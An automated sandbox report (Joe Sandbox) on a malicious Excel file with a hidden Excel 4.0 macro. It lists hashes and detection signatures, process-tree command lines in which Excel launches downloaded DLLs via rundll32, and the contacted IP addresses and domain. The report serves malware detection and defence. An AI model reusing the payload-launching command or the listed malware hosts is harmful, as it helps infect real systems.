Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report statistic-1496367785.xls

Overview

General Information

Sample Name:statistic-1496367785.xls
Analysis ID:441923
MD5:7fb48e03b899f792be6c3118a46c5c8f
SHA1:55445d13cd433121c6c2bfb31414b08e31e28a65
SHA256:1c818433e1ca49729f987b3f060b2133c8375f8164181c4684600a278ee6033f
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Yara detected Xls With Macro 4.0

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 6844 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 5304 cmdline: rundll32 ..\flamo.vir,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5428 cmdline: rundll32 ..\flamo.vir1,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
statistic-1496367785.xlsJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security
    statistic-1496367785.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\flamo.vir,DllRegisterServer, CommandLine: rundll32 ..\flamo.vir,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6844, ProcessCommandLine: rundll32 ..\flamo.vir,DllRegisterServer, ProcessId: 5304

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for submitted fileShow sources
      Source: statistic-1496367785.xlsVirustotal: Detection: 37%Perma Link
      Source: statistic-1496367785.xlsReversingLabs: Detection: 34%
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
      Source: unknownHTTPS traffic detected: 162.241.2.112:443 -> 192.168.2.4:49734 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.179.232.80:443 -> 192.168.2.4:49736 version: TLS 1.2

      Software Vulnerabilities:

      barindex
      Document exploit detected (UrlDownloadToFile)Show sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileA
      Document exploit detected (process start blacklist hit)Show sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe
      Source: global trafficDNS query: name: psq.com.mx
      Source: global trafficTCP traffic: 192.168.2.4:49734 -> 162.241.2.112:443
      Source: global trafficTCP traffic: 192.168.2.4:49734 -> 162.241.2.112:443
      Source: Joe Sandbox ViewIP Address: 108.179.232.80 108.179.232.80
      Source: Joe Sandbox ViewIP Address: 162.241.2.112 162.241.2.112
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: unknownDNS traffic detected: queries for: psq.com.mx
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://api.aadrm.com/
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://api.cortana.ai
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://api.diagnostics.office.com
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://api.microsoftstream.com/api/
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://api.office.net
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://api.onedrive.com
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://apis.live.net/v5.0/
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://augloop.office.com
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://augloop.office.com/v2
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://cdn.entity.
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://clients.config.office.net/
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://config.edge.skype.com
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://cortana.ai
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://cortana.ai/api
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://cr.office.com
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://dataservice.o365filtering.com
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://dataservice.o365filtering.com/
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://dev.cortana.ai
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://devnull.onenote.com
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://directory.services.
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://enrichment.osi.office.net/
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://graph.ppe.windows.net
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://graph.ppe.windows.net/
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://graph.windows.net
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://graph.windows.net/
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://incidents.diagnostics.office.com
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://lifecycle.office.com
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://login.microsoftonline.com/
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://login.windows.local
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://management.azure.com
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://management.azure.com/
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://messaging.office.com/
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://ncus.contentsync.
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://ncus.pagecontentsync.
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://officeapps.live.com
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://onedrive.live.com
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://onedrive.live.com/embed?
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://osi.office.net
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://outlook.office.com/
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://outlook.office365.com/
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://pages.store.office.com/review/query
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://powerlift.acompli.net
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://settings.outlook.com
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://shell.suite.office.com:1443
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://skyapi.live.net/Activity/
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://staging.cortana.ai
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://store.office.cn/addinstemplate
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://store.office.com/addinstemplate
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://store.office.de/addinstemplate
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://tasks.office.com
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://templatelogging.office.com/client/log
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://web.microsoftstream.com/video/
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://webshell.suite.office.com
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://wus2.contentsync.
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://wus2.pagecontentsync.
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
      Source: 0A8CE175-D39D-43AE-8F1B-CA84388C02A0.0.drString found in binary or memory: https://www.odwebp.svc.ms
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
      Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
      Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
      Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
